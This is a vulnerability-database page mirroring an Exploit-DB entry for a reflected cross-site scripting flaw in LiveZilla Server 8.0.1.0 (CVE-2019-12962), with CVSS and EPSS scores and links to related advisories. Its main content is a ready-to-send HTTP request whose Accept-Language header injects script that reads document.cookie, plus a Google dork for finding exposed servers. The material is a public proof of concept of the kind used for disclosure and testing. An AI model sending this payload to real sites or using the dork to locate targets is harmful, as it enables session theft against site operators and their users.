Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbClément CruchetEDB-ID:49669
HistoryMar 19, 2021 - 12:00 a.m.

LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS

2021-03-1900:00:00
Clément Cruchet
www.exploit-db.com
180

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.8 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.173 Low

EPSS

Percentile

96.0%

JSON
# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Date: 18 Mars 2021
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962

GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Related

cve 1
prion 1
zdt 1
packetstorm 1
nuclei 1
openvas 1
wallarmlab 1
cve
cve
CVE-2019-12962
2019-06-25 13:15:00
prion
prion
Design/Logic Flaw
2019-06-25 13:15:00
zdt
zdt
LiveZilla Server 8.0.1.0 - (Accept-Language) Reflected XSS Vulnerability
2021-03-19 00:00:00
packetstorm
packetstorm
LiveZilla Server 8.0.1.0 Cross Site Scripting
2021-03-19 00:00:00
nuclei
nuclei
LiveZilla Server 8.0.1.0 - Cross-Site Scripting
2022-05-08 14:45:08
openvas
openvas
LiveZilla < 8.0.1.2 Multiple XSS Vulnerabilities
2019-07-02 00:00:00
wallarmlab
wallarmlab
Weekly exploit digest – March, 15-21 – VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API
2021-03-21 13:09:00

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.8 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.173 Low

EPSS

Percentile

96.0%

JSON
Related for EDB-ID:49669
cve1prion1zdt1packetstorm1nuclei1openvas1wallarmlab1